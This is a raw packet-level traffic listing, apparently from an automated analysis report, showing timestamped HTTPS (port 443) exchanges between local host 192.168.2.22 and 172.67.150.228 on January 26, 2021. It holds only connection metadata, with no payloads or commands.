Jan 26, 2021 21:38:14.601913929 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.601917982 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.601932049 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.601936102 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.601948977 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.601959944 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.601967096 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.601994991 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.602715015 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.602745056 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.602752924 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.602766991 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.602786064 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.602793932 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.602804899 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.602818012 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.602824926 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.602840900 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.602879047 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.603696108 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.603718996 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.603739023 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.603745937 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.603758097 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.603763103 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.603775024 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.603785992 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.603794098 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.603810072 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.603825092 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.603841066 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.604614973 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.604639053 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.604660988 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.604664087 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.604684114 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.604684114 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.604701996 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.604707003 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.604717970 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.604728937 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.604737043 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.604760885 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.605567932 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.605591059 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.605611086 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.605644941 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.605659962 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.611820936 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.620965004 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.620990038 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.621010065 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.621030092 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.621051073 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.621068001 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.621088028 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.621115923 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.621119976 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.621308088 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.621352911 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.645227909 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.645256996 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.645277023 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.646275997 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.651793003 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.651823997 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.651835918 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.651988983 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.655438900 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.655466080 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.655488014 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.655509949 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.655530930 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.655550957 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.655563116 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.655586004 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.655590057 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.655833006 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.655860901 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.655881882 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.655881882 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.655889988 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.655905008 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.655916929 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.655926943 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.655936956 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.655949116 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.655956030 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.655983925 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.656841040 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.656867981 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.656888962 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.656908989 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.656927109 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.656929016 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.656939030 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.656940937 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.656953096 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.656965017 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.656985044 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.657780886 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.657808065 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.657830000 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.657850981 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.657871008 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.657881975 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.657891989 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.657895088 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.657902002 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.657939911 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.658699989 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.658724070 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.658746004 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.658767939 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.658771992 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.658782005 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.658791065 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.658802986 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.658813953 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.658821106 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.658850908 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.659718990 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.659744978 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.659765005 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.659786940 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.659787893 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.659794092 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.659810066 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.659825087 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.659835100 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.659842968 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.659869909 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.660732985 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.660758972 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.660782099 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.660801888 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.660803080 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.660825968 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.660830975 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.660834074 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.660840034 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.660849094 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.660861015 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.660878897 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.661689043 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.661720037 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.661741018 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.661761999 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.661761999 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.661783934 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.661787033 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.661792040 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.661796093 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.661807060 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.661817074 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.661844015 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.677288055 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.677321911 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.677342892 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.677366972 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.677396059 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.677445889 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.678004026 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.698023081 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.698054075 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.698072910 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.698215961 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.710366011 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.710403919 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.710427046 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.710445881 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.710463047 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.710505009 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.710824966 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.712255001 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.712285995 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.712308884 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.712331057 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.712349892 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.712357044 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.712372065 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.712376118 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.712383032 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.712412119 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.712754965 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.712780952 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.712809086 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.712825060 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.712831020 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.712841988 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.712853909 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.712866068 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.712874889 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.712882042 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.712909937 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.713726044 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.713756084 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.713777065 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.713797092 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.713810921 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.713819027 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.713819027 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.713831902 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.713843107 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.713849068 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.713886023 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.714715958 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.714745998 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.714766979 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.714787006 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.714809895 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.714812994 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.714833975 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.714835882 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.714848042 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.714869022 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.715611935 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.715636969 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.715657949 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.715672016 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.715677977 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.715697050 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.715699911 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.715702057 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.715711117 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.715720892 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.715728045 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.715754032 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.716537952 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.716590881 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.716614008 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.716633081 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.716638088 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.716644049 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.716660976 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.716672897 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.716681004 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.716689110 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.716702938 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.716705084 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.716737032 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.717581034 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.717605114 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.717624903 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.717638969 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.717645884 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.717653990 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.717668056 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.717679024 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.717690945 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.717699051 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.717725039 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.718478918 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.718537092 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.718578100 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.718600035 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.718616962 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.718620062 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.718628883 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.718642950 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.718647003 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.718677044 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.719543934 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.739468098 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.739491940 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.739511013 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.739532948 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.739548922 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.739620924 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.741950989 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.757678032 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.757704020 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.757720947 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.757849932 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.763196945 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.763221025 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.763236046 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.763355017 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.767929077 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.767955065 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.767975092 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.767995119 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.768017054 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.768038034 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.768037081 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.768059015 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.768064022 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.768073082 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.768390894 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.768455029 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.769903898 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.769953012 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.769977093 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.769995928 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.769999027 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.770009041 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.770020962 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.770032883 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.770041943 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.770054102 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.770073891 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.770328999 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.770353079 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.770375967 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.770387888 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.770394087 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.770400047 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.770409107 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.770421982 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.770437002 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.770442963 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.770457029 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.770473957 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.771260023 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.771284103 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.771307945 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.771328926 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.771332979 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.771348000 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.771349907 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.771368027 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.771372080 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.771385908 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.771405935 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.772253990 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.772339106 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.772349119 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.772372007 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.772392988 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.772394896 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.772413015 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.772416115 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.772437096 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.772438049 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.772452116 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.772469997 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:38:14.773256063 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.773279905 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.773300886 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:38:14.773315907 CET	49167	443	192.168.2.22	172.67.150.228
